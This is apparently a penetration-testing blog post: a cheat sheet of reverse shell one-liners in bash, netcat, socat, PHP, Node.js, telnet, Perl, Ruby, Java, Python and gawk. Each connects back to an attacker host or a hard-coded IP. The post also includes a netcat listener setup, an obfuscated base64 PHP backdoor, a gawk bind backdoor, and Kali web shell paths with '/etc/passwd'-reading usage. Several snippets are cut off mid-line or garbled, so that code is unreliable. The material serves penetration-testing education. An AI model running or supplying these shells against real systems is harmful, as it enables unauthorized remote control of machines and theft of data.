



Reverse Shell Cheat Sheet ∞

CHEAT-SHEET16 Sep 2020  Arr0way

During penetration testing if you're lucky enough to find a remote command execution vulnerability, you'll more often than not want to connect back to your attacking machine to leverage an interactive shell.

Below are a collection of **reverse shells** that use commonly installed programming languages, or commonly installed binaries (nc, telnet, bash, etc). At the bottom of the post are a collection of uploadable reverse shells, present in Kali Linux.

If you found this resource usefull you should also check out our penetration testing tools cheat sheet which has some additional reverse shells and other commands useful when performing penetration testing.

17/09/2020 - Updated to add the reverse shells submitted via Twitter @JaneScott
29/03/2015 - Original post date

Setup Listening Netcat

Your remote shell will need a listening netcat instance in order to connect back.

★ Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the following:

```
root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
```

ⓘ NAT requires a port forward

If you're attacking machine is behing a NAT router, you'll need to setup a port forward to the attacking machines IP / Port.

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ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).

Bash Reverse Shells

```
exec /bin/bash 0&0 2>&0
```

```
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
```

```
exec 5<>/dev/tcp/ATTACKING-IP/80  
cat <&5 | while read line; do $line 2>&5 >&5; done
```

```
# or:
```

```
while read line 0<&5; do $line 2>&5 >&5; done
```

```
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
```

socat Reverse Shell

Source: @filip_dragovic

```
socat tcp:ip:port exec:'bash -i' ,pty,stderr,setsid,sigint,sane &
```

Golang Reverse Shell

```
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial('
```

PHP Reverse Shell

A useful PHP reverse shell:

```
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3")'  
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
```

Another PHP reverse shell (that was submitted via Twitter):

```
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?
```

Base64 encrypted by @0xInfection:

```
<?=x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x|
```

Netcat Reverse Shell

Useful netcat reverse shell examples:

Don't forget to start your listener, or you won't be catching any shells :)

```
nc -lvp 80
```

```
nc -e /bin/sh ATTACKING-IP 80
```

```
/bin/sh | nc ATTACKING-IP 80
```

```
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
```

Node.js Reverse Shell

```
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');
```

Source: @jobertabma via @JaneScott

Telnet Reverse Shell

```
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
```

```
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

```
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,&
```

Perl Windows Reverse Shell

```
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fd
```

```
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,&
```

Ruby Reverse Shell

```
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/t
```

Java Reverse Shell

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | w
p.waitFor()
```

Python Reverse Shell

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"],shell=True)'>>>
```

Gawk Reverse Shell

Gawk one liner rev shell by @dmfroberson:

```
gawk 'BEGIN {P=4444;S=" ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P;while(1){if (cmd){while ((cmd |& Service) > 0) print $0 |& Service close(cmd)}}}{if ($0 ~ "exit") exit}{cmd=$0;close(Service);Service |& getline cmd}'>>>
```

```
#!/usr/bin/gawk -f

BEGIN {
    Port      =      8080
    Prompt   =      "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
```

Kali Web Shells

The following shells exist within Kali Linux, under `/usr/share/webshells/` these are only useful if you are able to upload, inject or transfer the shell to the machine.

Kali PHP Web Shells

Kali PHP reverse shells and command shells:

COMMAND	DESCRIPTION
<code>/usr/share/webshells/php/php-reverse-shell.php</code>	Pen Test Monkey - PHP Reverse Shell
<code>/usr/share/webshells/php/php-findsoc-shell.php</code> <code>/usr/share/webshells/php/findsoc.c</code>	Pen Test Monkey, Findsock Shell. Build <code>gcc -o findsoc findsoc.c</code> (be mindfull of the target servers architecture), execute with netcat not a browser <code>nc -v target 80</code>
<code>/usr/share/webshells/php/simple-backdoor.php</code>	PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: <code>http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd</code>

/usr/share/webshells/
php/php-backdoor.php

Larger PHP shell, with a text input box for command execution.

★ Tip: Executing Reverse Shells

The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.

Kali Perl Reverse Shell

Kali perl reverse shell:

COMMAND	DESCRIPTION
/usr/share/webshells/perl/ perl-reverse-shell.pl	Pen Test Monkey - Perl Reverse Shell
/usr/share/webshells/ perl/perlcmd.cgi	Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

Kali Coldfusion Shell:

COMMAND	DESCRIPTION
/usr/share/webshells/cfm/cfexec.cfm	Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

Classic ASP Reverse Shell + CMD shells:

COMMAND	DESCRIPTION
/usr/share/webshells/asp/	Kali ASP Shells

Kali ASPX Shells

ASP.NET reverse shells within Kali:

COMMAND	DESCRIPTION
/usr/share/webshells/aspx/	Kali ASPX Shells

Kali JSP Reverse Shell

Kali JSP Reverse Shell:

COMMAND	DESCRIPTION
/usr/share/webshells/jsp/jsp-reverse.jsp	Kali JSP Reverse Shell

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